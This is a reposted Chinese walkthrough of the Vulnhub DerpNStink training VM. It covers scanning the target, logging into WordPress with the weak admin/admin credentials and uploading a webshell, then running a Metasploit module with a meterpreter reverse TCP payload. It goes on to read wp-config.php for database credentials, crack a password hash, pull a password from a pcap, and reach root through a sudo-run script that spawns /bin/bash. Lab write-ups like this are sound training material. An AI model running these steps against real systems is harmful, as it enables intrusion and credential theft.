我的编程空间,编程开发者的网络收藏夹
学习永远不晚

Vulnhub:Derpnstink靶机渗透

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

Vulnhub:Derpnstink靶机渗透

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

fc9d3b282e794334ab2fd7d1aa8535de.png

扫描服务版本信息

9d75e0ff8d714801afeac4ca216feecb.png

 

开启了21、22、80端口,分别对应着ftp、ssh、http服务,打开浏览器进行访问

db94c83955dc4c6085dfdb6f7880ede8.png

 

查看源代码发现flag1和info.txt

9a3583d398ef42a89f89a29ea4297acd.png

 点开info.txt

d2588d87a0ea475e84a5c523b6beb0e6.png

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,weblog目录下存在登录页面,php目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

cf099bf3d4d84c9fb112ba23db17f818.png

进行访问的时候会发现weblog目录下的都打不开

12974d2f410f484fb904c4adb0e4c57e.png

刚好前面也拿到提示说要在本地添加一个dns记录,

Linux系统在/etc/hosts文件中进行添加

525202606abf4ef29c3e0aa5da51eb60.png

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

3b3637aba9b2473387829eb1106c6985.png

很明显是一个wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

a60a9fda753749b6b6624801cf84cfab.png

 登录到刚刚的网站

3254efea72d047faa8d3f1295ed6e82e.png

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

cc07c6c1e1b043db87fdf440add63677.png

查找配置文件并查看,拿到数据库的用户名和密码

27c8bad5f803427e91e92f6ebcc746b1.png

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

d54e94bd3a294bbe8402ae3ee54dc3a2.png

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

b08bb28290874c29ab7f504c8186baae.png

发现存在可以利用的模块,直接一把梭拿shell

use 1set payload php/meterpreter/reverse_tcpset rhosts 192.168.56.114set lhost 192.168.56.108set targeturi /weblogset wp_user adminset wp_password admin

 

78e3a35389aa4f58a6b956a7d44ab7da.png

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

d171a2308263474b8053bea6c7e8e20b.png

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

165ad58b55f54f5f9ca49245f34793c3.png

同时还发现了另外一个账号密码

e7f222aaeeda42159542c05af47260c5.png

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 639db01fc76c46b4ae6e7503b174fb5b.png

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

dd40ceef6add4d4bb81080ae761135cc.png

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

03775676e1eb42a2b9e083664ac12e07.png

在Desktop目录发现了flag3

04b360376f7744388a4d307fa50f36c1.png

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

4a16384b6366468b8bb45d58adacf6fb.png

在shell里切换登录到mrderp,发现不可行

d2f97a33c0e242559a12b028b1ccdeb4.png

接着尝试使用ssh进行远程连接

d66f68a3fe6f4aa4ba06c791a8ec0983.png

连接成功,并在Desktop目录下发现了一个日志文件

6a1e4befe6154700bb44defacc218c59.png

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

4a85c8fa1c824be1829fa77000eb72e5.png

9dd56ee66f984a48af6d63a545c90e95.png

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binariescd binariesecho “/bin/bash” >> derpy.shchmod +x derpy.shsudo ./derpy.sh

 

a9322fd9b9834825ab6b74b255616919.png

最后在root目录下的Desktop目录找到最后一个flag

 

来源地址:https://blog.csdn.net/m0_62008601/article/details/128443253

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

Vulnhub:Derpnstink靶机渗透

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

【App渗透】用BurpSuite抓包安卓手机app内容(详细)

文章目录 前言一、电脑端的配置二、BurpSuite的配置三、手机端的配置四、抓包总结 前言 很多情况下,在电脑的手机模拟器上面做app测试会存在大大小小的bug或者各种坑,而且有些模拟器很不方便,非常不好用。网上的教程虽然多
2023-08-17

云服务器防火墙关闭怎么渗透到主机

云服务器防火墙是一种虚拟化的安全产品,它将防火墙、入侵检测系统和应用程序安全组件等多种安全技术整合在一起,形成一个全面的安全体系。用户可以通过配置云服务器防火墙来控制网络流量、过滤不必要的访问、保护云服务器的数据安全,以及对入侵和攻击进行拦截和防范。在云服务器防火墙的配置中,可以通过选择防火墙软件来配置。防火墙软件的功
2023-10-27

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录